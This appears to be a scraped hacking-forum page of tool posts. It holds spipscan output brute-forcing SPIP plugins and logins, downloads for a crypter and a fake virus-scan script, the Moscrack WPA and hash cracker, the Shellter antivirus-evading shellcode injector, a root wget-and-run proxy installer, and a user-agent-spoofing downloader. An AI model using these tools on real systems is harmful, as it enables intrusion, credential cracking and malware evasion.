[!] Plugin compresseur detected. Version : 1.8.6 [!] Plugin dump detected. Version : 1.6.7 [!] Plugin filtres_images detected. Version : 1.1.7 [!] Plugin forum detected. Version : 1.8.29 [!] Plugin jquery_ui detected. Version : 1.8.21 [!] Plugin mediabox detected. Version : 0.8.4 [!] Plugin medias detected. Version : 2.7.51 [!] Plugin mots detected. Version : 2.4.10 [!] Plugin msie_compat detected. Versoin : 1.2.0 [!] Plugin organiseur detected. Version : 0.8.10 [!] Plugin petitions detected. Version : 1.4.4 [!] Plugin porte_plume detected. Version : 1.12.4 [!] Plugin revisions detected. Version : 1.7.6 [!] Plugin safehtml detected. Version : 1.4.0 [!] Plugin sites detected. Version : 1.7.10 [!] Plugin squelettes_par_rubrique detected. Version : 1.1.1 [!] Plugin statistiques detected. Version : 0.4.19 [!] Plugin svp detected. Version : 0.80.18 [!] Plugin textwheel detected. Version : 0.8.17 [!] Plugin urls_etendues detected. Version : 1.4.15 [!] Plugin vertebres detected. Version : 1.2.2 The next example performs brute force to detect existing plugins : $ python spipscan.py --website=http://website.com --plugins --bruteforce_plugins=plugins_name.db Plugins bruteforce: $ python spipscan.py --website=http://127.0.0.1 --bruteforce_plugins=plugins_name.db Result: Application is located here : http://127.0.0.1/ [!] Plugin folder is : plugins/ [-] Access forbidden on folder. [-] Trying : http://127.0.0.1/plugins/cfg/plugin.xml [-] Trying : http://127.0.0.1/plugins/cfg/paquet.xml [-] Trying : http://127.0.0.1/plugins/spip-bonux-3/plugin.xml [-] Trying : http://127.0.0.1/plugins/spip-bonux-3/paquet.xml [-] Trying : http://127.0.0.1/plugins/couteau_suisse/plugin.xml [-] Trying : http://127.0.0.1/plugins/couteau_suisse/paquet.xml [-] Trying : http://127.0.0.1/plugins/couteau_suisse_191/plugin.xml [-] Trying : http://127.0.0.1/plugins/couteau_suisse_191/paquet.xml [-] Trying : http://127.0.0.1/plugins/saisies/plugin.xml [-] Trying : http://127.0.0.1/plugins/saisies/paquet.xml Themes detection: $ python spipscan.py --website=http://127.0.0.1 --themes Result: Application is located here : http://127.0.0.1/ [-] We haven't been able to locate the themes folder Themes bruteforce: $ python spipscan.py --website=http://127.0.0.1 --bruteforce_themes=themes_name.db Result: Application is located here : http://127.0.0.1/ [!] Theme folder is : themes/ [-] Access forbidden on folder. [-] Trying : http://127.0.0.1/themes/scolaspip_3_0/plugin.xml [-] Trying : http://127.0.0.1/themes/scolaspip_3_0/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_einsteiniumist/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_einsteiniumist/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_brownie/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_brownie/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_brownie_v1/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_brownie_v1/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_darmstadtiumoid/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_darmstadtiumoid/paquet.xml [-] Trying : http://127.0.0.1/themes/squelette_darmstadtiumoid/plugin.xml [-] Trying : http://127.0.0.1/themes/squelette_darmstadtiumoid/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_brominerary/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_brominerary/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_tincredible/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_tincredible/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_maparaan/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_maparaan/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_initializr/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_initializr/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_ooCSS/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_ooCSS/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_californiumite/plugin.xml Vulnerabilities identification: $ python spipscan.py --website=http://127.0.0.1 --vulns Result: Application is located here : http://127.0.0.1/ [!] Version is : 2.1.12 [!] Plugin folder is : plugins/ [!] Potential Vulnerability : (versions : 2.0.21/2.1.16/3.0.3), SPIP connect Parameter PHP Injection, details : http://www.exploit-db.com/exploits/27941/ Sensitive folder identification: $ python spipscan.py --website=http://127.0.0.1 --sensitive_folders --verbose Result: Application is located here : http://127.0.0.1/ [!] Directory listing on folder : IMG/ [!] Directory listing on folder : prive/ [!] Directory listing on folder : local/ [!] Directory listing on folder : config/ [!] Directory listing on folder : local/ Bruteforce login on SPIP (v. 2.0.X): $ python spipscan.py --website=http://127.0.0.1 --path=/spip/ --users --bruteforce_logins_file=user_logins.db --verbose Result: Application is located here : http://127.0.0.1/spip/ [!] Version (in Headers) is : 2.0.24 Accessing http://127.0.0.1/spip/spip.php?page=login Form action args grabbed : 22S1TEIR6Ic7X9s41uTT+P8ntpRsNhjruYi5UZ5P8VMJ5VjfgqFrBeoa5+xz/roi9UtxAqw+j7bSTZiHHwjtj/kkOnzorNLXOneOGWXYIgNJI3uZdvq374q8NtT5nL7n56mO4+rJePWrUAhEXw== [!] Login found : admin [-] Tried login : administrator [-] Tried login : test [-] Tried login : guest [-] Tried login : root [-] Tried login : backup Download ZIP Source
  18. Download: http://www.mediafire.com/download/zjf8l8xn231em2b/Fake_Virus_Scan_Script.rar
  19. Crypter.exe Scan: https://www.metascan-online.com/de/s...525d6db06b59da Crypted.exe Scan: https://www.metascan-online.com/de/s...11438813a4302c Download: Download: Crypter.rar | www.xup.to password: scene-tools
  20. Fighting Power, Targeting and Cyber Operations P.A.L. Ducheine University of Amsterdam - Amsterdam Center for International Law Jelle Van Haaster University of Amsterdam - Amsterdam Center for International Law February 7, 2014 Amsterdam Law School Research Paper No. 2014-10 Amsterdam Center for International Law No. 2014-04 Abstract: This article aims to contribute to the operationalisation of military cyber operations in general, and for targeting purposes (either in defence or offence) in particular. The position of cyber operations in military doctrine will be clarified, their contribution to fighting power conceptualised and the ramifications on targeting processes discussed. Cyberspace poses unique challenges and opportunities; we distinguish new elements that may be utilized for ‘targeting’, namely: cyber objects and cyber identities. Constructive or disruptive cyber operations aimed at these non-physical elements provide new ways of attaining effects. Assessing the outcome of these cyber operations is, however, challenging for (military) planners. Intertwined network infrastructure and the global nature of cyberspace add to the complexity, but these difficulties can be overcome. In principle, the targeting cycle is suitable for cyber operations, yet, with an eye to (a) effectiveness of offensive and defensive operations, and ( legal obligations, special attention will be required regarding effects in general, and collateral damage assessment in particular. Number of Pages in PDF File: 36 JEL Classification: K33, L86, L96, N40, O30 Download: http://papers.ssrn.com/sol3/Delivery.cfm/SSRN_ID2392373_code1636539.pdf?abstractid=2392373&mirid=1 Fighting Power, Targeting and Cyber Operations by P.A.L. Ducheine, Jelle Van Haaster :: SSRN
  21. This tutorial is to show you how to install a proxy on Debian 7 using SQUID3 In order for this to work correctly you will need to follow these instructions. First you need to download the script, this can be done by running: wget http://rmlh.me/dw/squid.sh Login as root to the server that you will install SQUID on and with our favourite text editor and some copy/paste technique we will create the executable script. nano squid.sh Paste the text in the code section above and save the file. Make it executable with this command chmod +x ./squid-install.sh Execute the script and follow the instructions. You will actually only need to enter a username and password that will protect the proxy from anonymous use. The username and password is shown in clear-text when entering them, this is the only time they will be shown in clear-text so make sure no one is watching over your shoulder. ./squid.sh When everything is installed you will see the IP and username needed to connect to your proxy. To add another user you can run this command on the server running your Squid proxy server. htpasswd -b /etc/squid3/squid_passwd username password Change username to the username you would like to add and password to the password you would like to use. Source
  22. MOSCRACK Multifarious On-demand Systems Cracker Moscrack is a PERL application designed to facilitate cracking WPA keys in parallel on a group of computers. This is accomplished by use of either Mosix clustering software, SSH or RSH access to a number of nodes. With Moscrack’s new plugin framework, hash cracking has become possible. SHA256/512, DES, MD5 and *Blowfish Unix password hashes can all be processed with the Dehasher Moscrack plugin. Some of Moscrack's features: Basic API allows remote monitoring Automatic and dynamic configuration of nodes Live CD/USB enables boot and forget dynamic node configuration Can be extended by use of plugins Uses aircrack-ng (including 1.2 Beta) by default CUDA/OpenCL support via Pyrit plugin CUDA support via aircrack-ng-cuda (untested) Does not require an agent/daemon on nodes Can crack/compare SHA256/512, DES, MD5 and blowfish hashes via Dehasher plugin Checkpoint and resume Easily supports a large number of nodes Desgined to run for long periods of time Doesn't exit on errors/failures when possible Supports mixed OS/protocol configurations Supports SSH, RSH, Mosix for node connectivity Effectively handles mixed fast and slow nodes or links Architecture independent Supports Mosix clustering software Supports all popular operating systems as processing nodes Node prioritization based on speed Nodes can be added/removed/modified while Moscrack is running Failed/bad node throttling Hung node detection Reprocessing of data on error Automatic performance analysis and tuning Intercepts INT and TERM signals for clean handling Very verbose, doesn't hide anything, logs agressively Includes a "top" like status viewer Includes CGI web status viewer Includes an optional basic X11 GUI Compatibility Moscrack itself should work with any Un*x variant, but it is developed and tested on Linux. Tested platforms for SSH based end nodes: Moscrack Live CD (SUSE) Ubuntu Linux 12.10 x86 64bit Ubuntu Linux 12.04.2 x86 64bit Ubuntu Linux 10.10 x86 64bit Ubuntu Linux 10.10 x86 32bit CentOS Linux 5.5 x86 32bit FreeBSD 8.1 x86 64bit Windows Vista Business 64bit w/Cygwin 1.7.7-1 Windows Vista Business 64bit w/Cygwin 1.7.9 Mac OS X 10.5.6 (iPC OSx86) Solaris Express 11 x64 iPhone 3g iOS 3.2.1 (Jailbroken) Samsung Galaxy S2 SGH-I727R (Cyanogenmod 10 + Linux chroot) Tested platforms for RSH based end nodes: Ubuntu Linux 10.10 x86 64bit Windows Vista Business 64bit w/Cygwin 1.7.7-1 Windows Vista Business 64bit w/Cygwin 1.7.9 Tested platforms for Mosix end nodes: Ubuntu Linux 10.10 x86 64bit Ubuntu Linux 10.10 x86 32bit Tested platforms for Moscrack server: Ubuntu Linux 13.10 x86 64bit Ubuntu Linux 12.10 x86 64bit Ubuntu Linux 10.10 x86 64bit Download: moscrack-2.08b.tar.gz Sources: moscrack | Free Security & Utilities software downloads at SourceForge.net Moscrack
  23. Shellter is a dynamic shellcode injection tool aka dynamic PE infector. It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only). The shellcode can be something yours or something generated through a framework, such as Metasploit. Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections, adding an extra section with RWE access, and whatever would look dodgy under an AV scan. It uses a unique dynamic approach which is based on the execution flow of the target application. This means that no static/predefined locations are used for shellcode injection. Shellter will launch and trace the target, while at the same time will log the execution flow of the application. Also supports encoded/self-decrypting payloads by taking advantage of the Imports Table of the application. It will look for specific imported APIs that can be used on runtime to execute a self-decrypting payload without doing any modifications in the section’s characteristics from inside the PE Header. At the moment 7 methods are supported for loading encoded payloads: 0. VirtualAlloc 1. VirtualAllocEx 2. VirtualProtect 3. VirtualProtectEx 4. HeapCreate/HeapAlloc 5. LoadLibrary/GetProcAddress 6. CreateFileMapping/MapViewOfFile Read more... Download Password: _Sh3llt3r_ Source
  24. core program httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the traffic as it is parsed, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications. What can you do with it? Here's a few ideas: See what users on your network are requesting online Check for proper server configuration (or improper, as the case may be) Research patterns in HTTP usage Watch for dangerous downloaded files Verify the enforcement of HTTP policy on your network Extract HTTP statistics out of saved capture files It's just plain fun to watch in realtime Here's an example of the log file output using the default output format string: # httpry version 0.1.8 # Fields: timestamp,source-ip,dest-ip,direction,method,host,request-uri,http-version,status-code,reason-phrase 2009-01-12 15:02:31 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - - 2009-01-12 15:02:31 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - - 2009-01-12 15:02:32 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - - 2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - - 2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < - - - HTTP/1.1 200 OK 2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET www.google.com /intl/en_ALL/images/logo.gif HTTP/1.1 - - 2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < - - - HTTP/1.1 200 OK 2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET www.google.com /extern_js/f/CgJlbhICdXMrMAo4DSwrMA44AywrMBg4Ayw/AQ-hC7_2R8g.js HTTP/1.1 - - 2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < - - - HTTP/1.1 200 OK 2009-01-12 15:02:33 192.168.0.16 209.85.173.101 > GET clients1.google.com /generate_204 HTTP/1.1 - - 2009-01-12 15:02:33 209.85.173.101 192.168.0.16 < - - - HTTP/1.1 204 No Content parsing scripts Of course, the fun of collecting data is finding ways to analyze it. The log files are designed to be easily parsed by command line utilities, but sometimes you need to dig a little deeper. Complementing the core httpry program is a set of parsing scripts for mining information out of generated log files. Most of these scripts are written as plugins for a core parsing script and include functionality for extracting search terms, searching for specified terms within client flows, and outputting the logs in XML among other things. It is relatively straightforward to write custom plugins for additional parsing tasks. latest news The latest release adds a number of useful features and tweaks. VLAN tagged packets are now handled, and the PPP link type is supported. There's a new option available for specifying a custom ethernet header offset. Packet parsing is also improved with better handling of partial headers and a non-zero read timeout for live captures. For specifics of the changes in this release, check out the changelog As with many previous releases, most of the major features and improvements in this version are a direct result of contributions of code or ideas, which are always appreciated. The doc/AUTHORS file specifically lists those individuals as their contributions are greatly appreciated! The httpry codebase is hosted on GitHub if you would like to file a bug or contribute back to the project. Download | Source
      • 1
      • Upvote
  25. Github Link Informations Getjarpy is easy-to-use script/software with main use to download particular files from website GetJar | Mobile - Appsolutely Everything - worlds biggest open appstore, the oldest living database for downloading JAR files (applications, games, etc.) primary for older mobile phones. Getjarpy is transforming user-data and tricking website that it's been accessed over mobile phone and allowing user to automatically download JAR application. Note that GetJar official website is not allowing users to download files from PC as you can see from screencast bellow! getjarpy.py __author__ = 'dn5' __blog__ = 'http://dn5.ljuska.org' __github__ = 'https://github.com/dn5/getjarpy' __twitter__ = 'https://twitter.com/dn5__' __email__ = 'dn5@dn5.ljuska.org' import BeautifulSoup import urllib2 import socket import re import sys ########################## Details setting / About gjpyLogo = " _ _ \n"\ " __ _ ___| |_ (_) __ _ _ __ _ __ _ _ \n"\ " / _` |/ _ \ __|| |/ _` | '__| '_ \| | | |\n"\ "| (_| | __/ |_ | | (_| | | | |_) | |_| |\n"\ " \__, |\___|\__|/ |\__,_|_| | .__/ \__, |\n"\ " |___/ |__/ |_| |___/ \n"\ "Simple GetJar java application downloader "\ gjpyInfo = "Coded by dn5 / http://dn5.ljuska.org / @dn5__ \n" gjpyUsage = "Usage: python getjarpy.py http://getjar.mobi/mobile/xxxxxx/name-of-app-model localFileName" gjpyExample = "Example: python getjarpy.py http://www.getjar.mobi/mobile/567704/fooddash-for-nokia-5130-xpressmusic/ FoodDash" ########################## Basic testing for arguments if len(sys.argv) == 1: print gjpyLogo print gjpyInfo print "You didn't supply arguments! Use getjar.py --help for details." sys.exit() if len(sys.argv) == 2: if sys.argv[1] == "--help": print gjpyLogo print gjpyInfo print gjpyUsage print gjpyExample sys.exit() if len(sys.argv) == 3: print gjpyLogo print gjpyInfo print gjpyUsage print gjpyExample print "\nSetting a link for exploitation!" permaLink = sys.argv[1] print permaLink +"\n" #print "\nYour settings:" #print "Argument 0: " + sys.argv[0] #print "Argument 1: " + sys.argv[1] #print "Argument 2: " + sys.argv[2] print "\nWriting other settings!" ########################## Setting variables ua = "Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (J2ME/22.478; U; en) Presto/2.5.25 Version/10.54" # User-agent ol = "http://m.getjar.mobi/" # Original link mobileModel = "nokia-5130-xpressmusic/" setJavaModel = "--java/?d=-java" localFile = sys.argv[2]+".jar" ########################## Setting particular exploitation constants mainLink = permaLink.replace("-for-"+mobileModel, "-for"+setJavaModel) mainLink = mainLink.replace("http://www.", "http://m.") print "Trying to exploit this URL: " + mainLink ########################## Starting the production req = urllib2.Request(mainLink) req.add_unredirected_header('User-Agent', ua) response = urllib2.urlopen(req) #print req.header_items() try: html = response.read() # print html except urllib2.URLError, e: print "w00t w00t - Error while reading data. Are you connected to the interwebz?!", e sys.exit() print "Extracting some files from URL ..." soup = BeautifulSoup.BeautifulSoup(html) form = soup.find('form', id='form_product_page').get('action') reqDownload = urllib2.Request(ol + form) responseDownload = urllib2.urlopen(reqDownload) responseRead = responseDownload.read() print "Getting file data and extracting installation!" print #responseRead pLink = re.search("(?P<url>http?://[^\s]+)", responseRead).group("url") # Extracting URL from "responseRead" print "Getting a JAR file for the last time, I promise." jarFile = urllib2.urlopen(pLink) print "Opening a file for testing, just to make sure everything works!" output = open(localFile,'wb') print "Writting data ..." output.write(jarFile.read()) output.close() print "w00t w00t, your file is ready to be transfered or reverse engineered! Filename: " + localFile Usage To use Getjarpy you will need Python 2.7 with additional modules, read Dependencies for more information. Basic usage of Getjarpy is to edit line 63 and it's variable data "mobileModel" which is at the moment of writting set to nokia-5130-xpressmusic/. You can get your model name parsed by visiting GetJar | Mobile - Appsolutely Everything - worlds biggest open appstore, selecting your model and visiting any application listed. Then, it's just a matter of using predefined commands listed bellow. Please, make sure to change coresponding phone model, in case you don't, all files will be downloaded to the resolution of Nokia 5130 XpressMusic. To list usage / help use "--help" argument without quotes. $ python getjarpy.py --help _ _ __ _ ___| |_ (_) __ _ _ __ _ __ _ _ / _` |/ _ \ __|| |/ _` | '__| '_ \| | | | | (_| | __/ |_ | | (_| | | | |_) | |_| | \__, |\___|\__|/ |\__,_|_| | .__/ \__, | |___/ |__/ |_| |___/ Simple GetJar java application downloader Coded by dn5 / http://dn5.ljuska.org / @dn5__ Usage: python getjarpy.py http://getjar.mobi/mobile/xxxxxx/name-of-app-model localFileName Example: python getjarpy.py http://www.getjar.mobi/mobile/567704/fooddash-for-nokia-5130-xpressmusic/ FoodDash To download particular file use URL as 1st argument, and local file name as 2nd argument. Files will be sored inside directory from which application is started. $ python getjarpy.py http://www.getjar.mobi/mobile/567704/fooddash-for-nokia-5130-xpressmusic/ FoodDash _ _ __ _ ___| |_ (_) __ _ _ __ _ __ _ _ / _` |/ _ \ __|| |/ _` | '__| '_ \| | | | | (_| | __/ |_ | | (_| | | | |_) | |_| | \__, |\___|\__|/ |\__,_|_| | .__/ \__, | |___/ |__/ |_| |___/ Simple GetJar java application downloader Coded by dn5 / http://dn5.ljuska.org / @dn5__ Usage: python getjarpy.py http://getjar.mobi/mobile/xxxxxx/name-of-app-model localFileName Example: python getjarpy.py http://www.getjar.mobi/mobile/567704/fooddash-for-nokia-5130-xpressmusic/ FoodDash Setting a link for exploitation! http://www.getjar.mobi/mobile/567704/fooddash-for-nokia-5130-xpressmusic/ Writing other settings! Trying to exploit this URL: http://m.getjar.mobi/mobile/567704/fooddash-for--java/?d=-java Extracting some files from URL ... Getting file data and extracting installation! Getting a JAR file for the last time, I promise. Opening a file for testing, just to make sure everything works! Writting data ... w00t w00t, your file is ready to be transfered or reverse engineered! Filename: FoodDash.jar Dependencies Python 2.7 BeautifulSoup ( pip install BeautifulSoup ) urllib2 (should come installed by default) socket (should come installed by default) About & License This software is not intended to replace mobile downloading operation from GetJar, it is used for testing purpose and is not suported to use for illegal act. Me, dn5 coded this software for testing purpose and learning experience with Python. Software is licensed under GNU General Public License v3.0 (GPL-3.0). Author: dn5 Blog: htp:/dn5.ljuska.org Twitter: @dn5__ Email: dn5@dn5.ljuska.org Getjarpy - Download applications from Getjar
×
×
  • Create New...